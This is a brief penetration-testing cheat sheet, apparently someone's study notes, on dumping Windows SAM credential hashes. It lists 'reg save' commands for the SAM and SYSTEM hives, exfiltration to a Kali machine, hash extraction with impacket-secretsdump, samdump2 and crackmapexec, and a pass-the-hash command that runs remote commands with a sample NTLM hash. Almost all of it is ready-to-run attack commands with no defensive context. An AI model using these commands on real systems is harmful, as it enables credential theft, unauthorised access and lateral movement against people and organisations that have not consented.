Dumping the SAM hashes on Victim
reg save hklm\system system
reg save hklm\sam sam
-> Exfiltrate to our Kali machine and use a tool called samdump2 or powershell or mimikatz.
# Methods, not everytime hashes are crackable.
1) impacket-secretsdump -sam sam -system system -security security local # BEST
2) cp /usr/bin/samdump2 .
samdump2 system sam # Less Reliable
3) crackmapexec smb <IP> -u <user> -p <pass> --sam
SAM Hash Cracking
# Put DC IP or IP where you want to Pivot, the user is from SAM hash, Modify the hash and remove dots and name.
crackmapexec smb <IP> -u <user> -H aad3b435b51404eeaad3b435b51404ee:8c802621d2e36fc074345dded890f3e5 -x ipconfig